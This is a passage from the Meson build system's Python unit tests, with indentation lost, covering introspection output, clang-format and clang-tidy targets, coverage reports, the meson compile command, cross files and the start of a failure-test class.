def test_introspect_projectinfo_subproject_dir_from_source(self):
testfile = os.path.join(self.common_test_dir, '78 custom subproject dir', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
@skipIfNoExecutable('clang-format')
def test_clang_format(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-format is for now only supported on Ninja, not {}'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '54 clang-format')
testfile = os.path.join(testdir, 'prog.c')
badfile = os.path.join(testdir, 'prog_orig_c')
goodfile = os.path.join(testdir, 'prog_expected_c')
testheader = os.path.join(testdir, 'header.h')
badheader = os.path.join(testdir, 'header_orig_h')
goodheader = os.path.join(testdir, 'header_expected_h')
try:
shutil.copyfile(badfile, testfile)
shutil.copyfile(badheader, testheader)
self.init(testdir)
self.assertNotEqual(Path(testfile).read_text(),
Path(goodfile).read_text())
self.assertNotEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
self.run_target('clang-format')
self.assertEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
finally:
if os.path.exists(testfile):
os.unlink(testfile)
if os.path.exists(testheader):
os.unlink(testheader)
@skipIfNoExecutable('clang-tidy')
def test_clang_tidy(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-tidy is for now only supported on Ninja, not {}'.format(self.backend.name))
if shutil.which('c++') is None:
raise unittest.SkipTest('Clang-tidy breaks when ccache is used and "c++" not in path.')
if is_osx():
raise unittest.SkipTest('Apple ships a broken clang-tidy that chokes on -pipe.')
testdir = os.path.join(self.unit_test_dir, '70 clang-tidy')
self.init(testdir, override_envvars={'CXX': 'c++'})
out = self.run_target('clang-tidy')
self.assertIn('cttest.cpp:4:20', out)
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '71 cross')
# Do a build to generate a cross file where the host is this target
self.init(testdir, extra_args=['-Dgenerate=true'])
self.meson_cross_file = os.path.join(self.builddir, "crossfile")
self.assertTrue(os.path.exists(self.meson_cross_file))
# Now verify that this is detected as cross
self.new_builddir()
self.init(testdir)
def test_introspect_buildoptions_without_configured_build(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
self.init(testdir, default_args=False)
res_wb = self.introspect('--buildoptions')
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_meson_configure_from_source_does_not_crash(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
self._run(self.mconf_command + [testdir])
def test_introspect_buildoptions_cross_only(self):
testdir = os.path.join(self.unit_test_dir, '83 cross only introspect')
testfile = os.path.join(testdir, 'meson.build')
res = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
optnames = [o['name'] for o in res]
self.assertIn('c_args', optnames)
self.assertNotIn('build.c_args', optnames)
def test_introspect_json_dump(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
def assertKeyTypes(key_type_list, obj):
for i in key_type_list:
self.assertIn(i[0], obj)
self.assertIsInstance(obj[i[0]], i[1])
root_keylist = [
('benchmarks', list),
('buildoptions', list),
('buildsystem_files', list),
('dependencies', list),
('installed', dict),
('projectinfo', dict),
('targets', list),
('tests', list),
]
test_keylist = [
('cmd', list),
('env', dict),
('name', str),
('timeout', int),
('suite', list),
('is_parallel', bool),
('protocol', str),
('depends', list),
]
buildoptions_keylist = [
('name', str),
('section', str),
('type', str),
('description', str),
('machine', str),
]
buildoptions_typelist = [
('combo', str, [('choices', list)]),
('string', str, []),
('boolean', bool, []),
('integer', int, []),
('array', list, []),
]
buildoptions_sections = ['core', 'backend', 'base', 'compiler', 'directory', 'user', 'test']
buildoptions_machines = ['any', 'build', 'host']
dependencies_typelist = [
('name', str),
('version', str),
('compile_args', list),
('link_args', list),
]
targets_typelist = [
('name', str),
('id', str),
('type', str),
('defined_in', str),
('filename', list),
('build_by_default', bool),
('target_sources', list),
('installed', bool),
]
targets_sources_typelist = [
('language', str),
('compiler', list),
('parameters', list),
('sources', list),
('generated_sources', list),
]
# First load all files
res = {}
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i[0]))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res[i[0]] = json.load(fp)
assertKeyTypes(root_keylist, res)
# Match target ids to input and output files for ease of reference
src_to_id = {}
out_to_id = {}
for i in res['targets']:
print(json.dump(i, sys.stdout))
out_to_id.update({os.path.relpath(out, self.builddir): i['id']
for out in i['filename']})
for group in i['target_sources']:
src_to_id.update({os.path.relpath(src, testdir): i['id']
for src in group['sources']})
# Check Tests and benchmarks
tests_to_find = ['test case 1', 'test case 2', 'benchmark 1']
deps_to_find = {'test case 1': [src_to_id['t1.cpp']],
'test case 2': [src_to_id['t2.cpp'], src_to_id['t3.cpp']],
'benchmark 1': [out_to_id['file2'], src_to_id['t3.cpp']]}
for i in res['benchmarks'] + res['tests']:
assertKeyTypes(test_keylist, i)
if i['name'] in tests_to_find:
tests_to_find.remove(i['name'])
self.assertEqual(sorted(i['depends']),
sorted(deps_to_find[i['name']]))
self.assertListEqual(tests_to_find, [])
# Check buildoptions
buildopts_to_find = {'cpp_std': 'c++11'}
for i in res['buildoptions']:
assertKeyTypes(buildoptions_keylist, i)
valid_type = False
for j in buildoptions_typelist:
if i['type'] == j[0]:
self.assertIsInstance(i['value'], j[1])
assertKeyTypes(j[2], i)
valid_type = True
break
self.assertIn(i['section'], buildoptions_sections)
self.assertIn(i['machine'], buildoptions_machines)
self.assertTrue(valid_type)
if i['name'] in buildopts_to_find:
self.assertEqual(i['value'], buildopts_to_find[i['name']])
buildopts_to_find.pop(i['name'], None)
self.assertDictEqual(buildopts_to_find, {})
# Check buildsystem_files
bs_files = ['meson.build', 'meson_options.txt', 'sharedlib/meson.build', 'staticlib/meson.build']
bs_files = [os.path.join(testdir, x) for x in bs_files]
self.assertPathListEqual(list(sorted(res['buildsystem_files'])), list(sorted(bs_files)))
# Check dependencies
dependencies_to_find = ['threads']
for i in res['dependencies']:
assertKeyTypes(dependencies_typelist, i)
if i['name'] in dependencies_to_find:
dependencies_to_find.remove(i['name'])
self.assertListEqual(dependencies_to_find, [])
# Check projectinfo
self.assertDictEqual(res['projectinfo'], {'version': '1.2.3', 'descriptive_name': 'introspection', 'subproject_dir': 'subprojects', 'subprojects': []})
# Check targets
targets_to_find = {
'sharedTestLib': ('shared library', True, False, 'sharedlib/meson.build'),
'staticTestLib': ('static library', True, False, 'staticlib/meson.build'),
'test1': ('executable', True, True, 'meson.build'),
'test2': ('executable', True, False, 'meson.build'),
'test3': ('executable', True, False, 'meson.build'),
}
for i in res['targets']:
assertKeyTypes(targets_typelist, i)
if i['name'] in targets_to_find:
tgt = targets_to_find[i['name']]
self.assertEqual(i['type'], tgt[0])
self.assertEqual(i['build_by_default'], tgt[1])
self.assertEqual(i['installed'], tgt[2])
self.assertPathEqual(i['defined_in'], os.path.join(testdir, tgt[3]))
targets_to_find.pop(i['name'], None)
for j in i['target_sources']:
assertKeyTypes(targets_sources_typelist, j)
self.assertDictEqual(targets_to_find, {})
def test_introspect_file_dump_equals_all(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
res_all = self.introspect('--all')
res_file = {}
root_keylist = [
'benchmarks',
'buildoptions',
'buildsystem_files',
'dependencies',
'installed',
'projectinfo',
'targets',
'tests',
]
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res_file[i] = json.load(fp)
self.assertEqual(res_all, res_file)
def test_introspect_meson_info(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'meson-info.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
for i in ['meson_version', 'directories', 'introspection', 'build_files_updated', 'error']:
self.assertIn(i, res1)
self.assertEqual(res1['error'], False)
self.assertEqual(res1['build_files_updated'], True)
def test_introspect_config_update(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-buildoptions.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
self.setconf('-Dcpp_std=c++14')
self.setconf('-Dbuildtype=release')
for idx, i in enumerate(res1):
if i['name'] == 'cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'build.cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'buildtype':
res1[idx]['value'] = 'release'
if i['name'] == 'optimization':
res1[idx]['value'] = '3'
if i['name'] == 'debug':
res1[idx]['value'] = False
with open(introfile, 'r') as fp:
res2 = json.load(fp)
self.assertListEqual(res1, res2)
def test_introspect_targets_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-targets.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res_wb = json.load(fp)
res_nb = self.introspect_directory(testfile, ['--targets'] + self.meson_args)
# Account for differences in output
res_wb = [i for i in res_wb if i['type'] != 'custom']
for i in res_wb:
i['filename'] = [os.path.relpath(x, self.builddir) for x in i['filename']]
if 'install_filename' in i:
del i['install_filename']
sources = []
for j in i['target_sources']:
sources += j['sources']
i['target_sources'] = [{
'language': 'unknown',
'compiler': [],
'parameters': [],
'sources': sources,
'generated_sources': []
}]
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_introspect_ast_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--ast'] + self.meson_args)
node_counter = {}
def accept_node(json_node):
self.assertIsInstance(json_node, dict)
for i in ['lineno', 'colno', 'end_lineno', 'end_colno']:
self.assertIn(i, json_node)
self.assertIsInstance(json_node[i], int)
self.assertIn('node', json_node)
n = json_node['node']
self.assertIsInstance(n, str)
self.assertIn(n, nodes)
if n not in node_counter:
node_counter[n] = 0
node_counter[n] = node_counter[n] + 1
for nodeDesc in nodes[n]:
key = nodeDesc[0]
func = nodeDesc[1]
self.assertIn(key, json_node)
if func is None:
tp = nodeDesc[2]
self.assertIsInstance(json_node[key], tp)
continue
func(json_node[key])
def accept_node_list(node_list):
self.assertIsInstance(node_list, list)
for i in node_list:
accept_node(i)
def accept_kwargs(kwargs):
self.assertIsInstance(kwargs, list)
for i in kwargs:
self.assertIn('key', i)
self.assertIn('val', i)
accept_node(i['key'])
accept_node(i['val'])
nodes = {
'BooleanNode': [('value', None, bool)],
'IdNode': [('value', None, str)],
'NumberNode': [('value', None, int)],
'StringNode': [('value', None, str)],
'ContinueNode': [],
'BreakNode': [],
'ArgumentNode': [('positional', accept_node_list), ('kwargs', accept_kwargs)],
'ArrayNode': [('args', accept_node)],
'DictNode': [('args', accept_node)],
'EmptyNode': [],
'OrNode': [('left', accept_node), ('right', accept_node)],
'AndNode': [('left', accept_node), ('right', accept_node)],
'ComparisonNode': [('left', accept_node), ('right', accept_node), ('ctype', None, str)],
'ArithmeticNode': [('left', accept_node), ('right', accept_node), ('op', None, str)],
'NotNode': [('right', accept_node)],
'CodeBlockNode': [('lines', accept_node_list)],
'IndexNode': [('object', accept_node), ('index', accept_node)],
'MethodNode': [('object', accept_node), ('args', accept_node), ('name', None, str)],
'FunctionNode': [('args', accept_node), ('name', None, str)],
'AssignmentNode': [('value', accept_node), ('var_name', None, str)],
'PlusAssignmentNode': [('value', accept_node), ('var_name', None, str)],
'ForeachClauseNode': [('items', accept_node), ('block', accept_node), ('varnames', None, list)],
'IfClauseNode': [('ifs', accept_node_list), ('else', accept_node)],
'IfNode': [('condition', accept_node), ('block', accept_node)],
'UMinusNode': [('right', accept_node)],
'TernaryNode': [('condition', accept_node), ('true', accept_node), ('false', accept_node)],
}
accept_node(res_nb)
for n, c in [('ContinueNode', 2), ('BreakNode', 1), ('NotNode', 3)]:
self.assertIn(n, node_counter)
self.assertEqual(node_counter[n], c)
def test_introspect_dependencies_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--scan-dependencies'] + self.meson_args)
expected = [
{
'name': 'threads',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'zlib',
'required': False,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'bugDep1',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'somethingthatdoesnotexist',
'required': True,
'version': ['>=1.2.3'],
'has_fallback': False,
'conditional': True
},
{
'name': 'look_i_have_a_fallback',
'required': True,
'version': ['>=1.0.0', '<=99.9.9'],
'has_fallback': True,
'conditional': True
}
]
self.maxDiff = None
self.assertListEqual(res_nb, expected)
def test_unstable_coredata(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
# just test that the command does not fail (e.g. because it throws an exception)
self._run([*self.meson_command, 'unstable-coredata', self.builddir])
@skip_if_no_cmake
def test_cmake_prefix_path(self):
testdir = os.path.join(self.unit_test_dir, '64 cmake_prefix_path')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
@skip_if_no_cmake
def test_cmake_parser(self):
testdir = os.path.join(self.unit_test_dir, '65 cmake parser')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
def test_alias_target(self):
if self.backend is Backend.vs:
# FIXME: This unit test is broken with vs backend, needs investigation
raise unittest.SkipTest('Skipping alias_target test with {} backend'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '66 alias target')
self.init(testdir)
self.build()
self.assertPathDoesNotExist(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'hello.txt'))
self.run_target('build-all')
self.assertPathExists(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathExists(os.path.join(self.builddir, 'hello.txt'))
def test_configure(self):
testdir = os.path.join(self.common_test_dir, '2 cpp')
self.init(testdir)
self._run(self.mconf_command + [self.builddir])
def test_summary(self):
testdir = os.path.join(self.unit_test_dir, '73 summary')
out = self.init(testdir)
expected = textwrap.dedent(r'''
Some Subproject 2.0
string: bar
integer: 1
boolean: True
My Project 1.0
Configuration
Some boolean: False
Another boolean: True
Some string: Hello World
A list: string
1
True
empty list:
A number: 1
yes: YES
no: NO
coma list: a, b, c
Plugins
long coma list: alpha, alphacolor, apetag, audiofx, audioparsers, auparse,
autodetect, avi
Subprojects
sub: YES
sub2: NO Problem encountered: This subproject failed
''')
expected_lines = expected.split('\n')[1:]
out_start = out.find(expected_lines[0])
out_lines = out[out_start:].split('\n')[:len(expected_lines)]
if sys.version_info < (3, 7, 0):
# Dictionary order is not stable in Python <3.7, so sort the lines
# while comparing
self.assertEqual(sorted(expected_lines), sorted(out_lines))
else:
self.assertEqual(expected_lines, out_lines)
def test_meson_compile(self):
"""Test the meson compile command."""
def get_exe_name(basename: str) -> str:
if is_windows():
return '{}.exe'.format(basename)
else:
return basename
def get_shared_lib_name(basename: str) -> str:
if mesonbuild.environment.detect_msys2_arch():
return 'lib{}.dll'.format(basename)
elif is_windows():
return '{}.dll'.format(basename)
elif is_cygwin():
return 'cyg{}.dll'.format(basename)
elif is_osx():
return 'lib{}.dylib'.format(basename)
else:
return 'lib{}.so'.format(basename)
def get_static_lib_name(basename: str) -> str:
return 'lib{}.a'.format(basename)
# Base case (no targets or additional arguments)
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
self._run([*self.meson_command, 'compile', '-C', self.builddir])
self.assertPathExists(os.path.join(self.builddir, get_exe_name('trivialprog')))
# `--clean`
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--clean'])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
# Target specified in a project with unique names
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir, extra_args=['--wipe'])
# Multiple targets and target type specified
self._run([*self.meson_command, 'compile', '-C', self.builddir, 'mylib', 'mycpplib:shared_library'])
# Check that we have a shared lib, but not an executable, i.e. check that target actually worked
self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mylib')))
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('prog')))
self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mycpplib')))
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('cppprog')))
# Target specified in a project with non unique names
testdir = os.path.join(self.common_test_dir, '190 same target name')
self.init(testdir, extra_args=['--wipe'])
self._run([*self.meson_command, 'compile', '-C', self.builddir, './foo'])
self.assertPathExists(os.path.join(self.builddir, get_static_lib_name('foo')))
self._run([*self.meson_command, 'compile', '-C', self.builddir, 'sub/foo'])
self.assertPathExists(os.path.join(self.builddir, 'sub', get_static_lib_name('foo')))
# run_target
testdir = os.path.join(self.common_test_dir, '54 run target')
self.init(testdir, extra_args=['--wipe'])
out = self._run([*self.meson_command, 'compile', '-C', self.builddir, 'py3hi'])
self.assertIn('I am Python3.', out)
# `--$BACKEND-args`
testdir = os.path.join(self.common_test_dir, '1 trivial')
if self.backend is Backend.ninja:
self.init(testdir, extra_args=['--wipe'])
# Dry run - should not create a program
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--ninja-args=-n'])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
elif self.backend is Backend.vs:
self.init(testdir, extra_args=['--wipe'])
self._run([*self.meson_command, 'compile', '-C', self.builddir])
# Explicitly clean the target through msbuild interface
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--vs-args=-t:{}:Clean'.format(re.sub(r'[\%\$\@\;\.\(\)\']', '_', get_exe_name('trivialprog')))])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
def test_spurious_reconfigure_built_dep_file(self):
testdir = os.path.join(self.unit_test_dir, '75 dep files')
# Regression test: Spurious reconfigure was happening when build
# directory is inside source directory.
# See https://gitlab.freedesktop.org/gstreamer/gst-build/-/issues/85.
srcdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, srcdir)
builddir = os.path.join(srcdir, '_build')
self.change_builddir(builddir)
self.init(srcdir)
self.build()
# During first configure the file did not exist so no dependency should
# have been set. A rebuild should not trigger a reconfigure.
self.clean()
out = self.build()
self.assertNotIn('Project configured', out)
self.init(srcdir, extra_args=['--reconfigure'])
# During the reconfigure the file did exist, but is inside build
# directory, so no dependency should have been set. A rebuild should not
# trigger a reconfigure.
self.clean()
out = self.build()
self.assertNotIn('Project configured', out)
def _test_junit(self, case: str) -> None:
try:
import lxml.etree as et
except ImportError:
raise unittest.SkipTest('lxml required, but not found.')
schema = et.XMLSchema(et.parse(str(Path(__file__).parent / 'data' / 'schema.xsd')))
self.init(case)
self.run_tests()
junit = et.parse(str(Path(self.builddir) / 'meson-logs' / 'testlog.junit.xml'))
try:
schema.assertValid(junit)
except et.DocumentInvalid as e:
self.fail(e.error_log)
def test_junit_valid_tap(self):
self._test_junit(os.path.join(self.common_test_dir, '213 tap tests'))
def test_junit_valid_exitcode(self):
self._test_junit(os.path.join(self.common_test_dir, '44 test args'))
def test_junit_valid_gtest(self):
self._test_junit(os.path.join(self.framework_test_dir, '2 gtest'))
def test_link_language_linker(self):
# TODO: there should be some way to query how we're linking things
# without resorting to reading the ninja.build file
if self.backend is not Backend.ninja:
raise unittest.SkipTest('This test reads the ninja file')
testdir = os.path.join(self.common_test_dir, '232 link language')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
self.assertRegex(contents, r'build main(\.exe)?.*: c_LINKER')
self.assertRegex(contents, r'build (lib|cyg)?mylib.*: c_LINKER')
def test_commands_documented(self):
'''
Test that all listed meson commands are documented in Commands.md.
'''
# The docs directory is not in release tarballs.
if not os.path.isdir('docs'):
raise unittest.SkipTest('Doc directory does not exist.')
doc_path = 'docs/markdown_dynamic/Commands.md'
md = None
with open(doc_path, encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
## Get command sections
section_pattern = re.compile(r'^### (.+)$', re.MULTILINE)
md_command_section_matches = [i for i in section_pattern.finditer(md)]
md_command_sections = dict()
for i, s in enumerate(md_command_section_matches):
section_end = len(md) if i == len(md_command_section_matches) - 1 else md_command_section_matches[i + 1].start()
md_command_sections[s.group(1)] = (s.start(), section_end)
## Validate commands
md_commands = set(k for k,v in md_command_sections.items())
help_output = self._run(self.meson_command + ['--help'])
help_commands = set(c.strip() for c in re.findall(r'usage:(?:.+)?{((?:[a-z]+,*)+?)}', help_output, re.MULTILINE|re.DOTALL)[0].split(','))
self.assertEqual(md_commands | {'help'}, help_commands, 'Doc file: `{}`'.format(doc_path))
## Validate that each section has proper placeholders
def get_data_pattern(command):
return re.compile(
r'^```[\r\n]'
r'{{ cmd_help\[\'' + command + r'\'\]\[\'usage\'\] }}[\r\n]'
r'^```[\r\n]'
r'.*?'
r'^```[\r\n]'
r'{{ cmd_help\[\'' + command + r'\'\]\[\'arguments\'\] }}[\r\n]'
r'^```',
flags = re.MULTILINE|re.DOTALL)
for command in md_commands:
m = get_data_pattern(command).search(md, pos=md_command_sections[command][0], endpos=md_command_sections[command][1])
self.assertIsNotNone(m, 'Command `{}` is missing placeholders for dynamic data. Doc file: `{}`'.format(command, doc_path))
def _check_coverage_files(self, types=('text', 'xml', 'html')):
covdir = Path(self.builddir) / 'meson-logs'
files = []
if 'text' in types:
files.append('coverage.txt')
if 'xml' in types:
files.append('coverage.xml')
if 'html' in types:
files.append('coveragereport/index.html')
for f in files:
self.assertTrue((covdir / f).is_file(), msg='{} is not a file'.format(f))
def test_coverage(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage')
self._check_coverage_files()
def test_coverage_complex(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '109 generatorcustom')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage')
self._check_coverage_files()
def test_coverage_html(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-html')
self._check_coverage_files(['html'])
def test_coverage_text(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-text')
self._check_coverage_files(['text'])
def test_coverage_xml(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-xml')
self._check_coverage_files(['xml'])
def test_cross_file_constants(self):
with temp_filename() as crossfile1, temp_filename() as crossfile2:
with open(crossfile1, 'w') as f:
f.write(textwrap.dedent(
'''
[constants]
compiler = 'gcc'
'''))
with open(crossfile2, 'w') as f:
f.write(textwrap.dedent(
'''
[constants]
toolchain = '/toolchain/'
common_flags = ['--sysroot=' + toolchain / 'sysroot']
[properties]
c_args = common_flags + ['-DSOMETHING']
cpp_args = c_args + ['-DSOMETHING_ELSE']
[binaries]
c = toolchain / compiler
'''))
values = mesonbuild.coredata.parse_machine_files([crossfile1, crossfile2])
self.assertEqual(values['binaries']['c'], '/toolchain/gcc')
self.assertEqual(values['properties']['c_args'],
['--sysroot=/toolchain/sysroot', '-DSOMETHING'])
self.assertEqual(values['properties']['cpp_args'],
['--sysroot=/toolchain/sysroot', '-DSOMETHING', '-DSOMETHING_ELSE'])
@unittest.skipIf(is_windows(), 'Directory cleanup fails for some reason')
def test_wrap_git(self):
with tempfile.TemporaryDirectory() as tmpdir:
srcdir = os.path.join(tmpdir, 'src')
shutil.copytree(os.path.join(self.unit_test_dir, '81 wrap-git'), srcdir)
upstream = os.path.join(srcdir, 'subprojects', 'wrap_git_upstream')
upstream_uri = Path(upstream).as_uri()
_git_init(upstream)
with open(os.path.join(srcdir, 'subprojects', 'wrap_git.wrap'), 'w') as f:
f.write(textwrap.dedent('''
[wrap-git]
url = {}
patch_directory = wrap_git_builddef
revision = master
'''.format(upstream_uri)))
self.init(srcdir)
self.build()
self.run_tests()
def test_multi_output_custom_target_no_warning(self):
testdir = os.path.join(self.common_test_dir, '235 custom_target source')
out = self.init(testdir)
self.assertNotRegex(out, 'WARNING:.*Using the first one.')
self.build()
self.run_tests()
@unittest.skipUnless(is_linux() and (re.search('^i.86$|^x86$|^x64$|^x86_64$|^amd64$', platform.processor()) is not None),
'Requires ASM compiler for x86 or x86_64 platform currently only available on Linux CI runners')
def test_nostdlib(self):
testdir = os.path.join(self.unit_test_dir, '79 nostdlib')
machinefile = os.path.join(self.builddir, 'machine.txt')
with open(machinefile, 'w') as f:
f.write(textwrap.dedent('''
[properties]
c_stdlib = 'mylibc'
'''))
# Test native C stdlib
self.meson_native_file = machinefile
self.init(testdir)
self.build()
# Test cross C stdlib
self.new_builddir()
self.meson_native_file = None
self.meson_cross_file = machinefile
self.init(testdir)
self.build()
def test_meson_version_compare(self):
testdir = os.path.join(self.unit_test_dir, '82 meson version compare')
out = self.init(testdir)
self.assertNotRegex(out, r'WARNING')
class FailureTests(BasePlatformTests):
'''
Tests that test failure conditions. Build files here should be dynamically
generated and static tests should go into `test cases/failing*`.
This is useful because there can be many ways in which a particular
function can fail, and creating failing tests for all of them is tedious
and slows down testing.
'''
dnf = "[Dd]ependency.*not found(:.*)?"
nopkg = '[Pp]kg-config.*not found'
def setUp(self):
super().setUp()
self.srcdir = os.path.realpath(tempfile.mkdtemp())
self.mbuild = os.path.join(self.srcdir, 'meson.build')
self.moptions = os.path.join(self.srcdir, 'meson_options.txt')
def tearDown(self):
super().tearDown()
windows_proof_rmtree(self.srcdir)
def assertMesonRaises(self, contents, match, *,
extra_args=None,
langs=None,
meson_version=None,
options=None,
override_envvars=None):
'''
Assert that running meson configure on the specified @contents raises
a error message matching regex @match.
'''
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('failure test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
if options is not None:
with open(self.moptions, 'w') as f:
f.write(options)
o = {'MESON_FORCE_BACKTRACE': '1'}
if override_envvars is None:
override_envvars = o
else:
override_envvars.update(o)
# Force tracebacks so we can detect them properly
with self.assertRaisesRegex(MesonException, match, msg=contents):
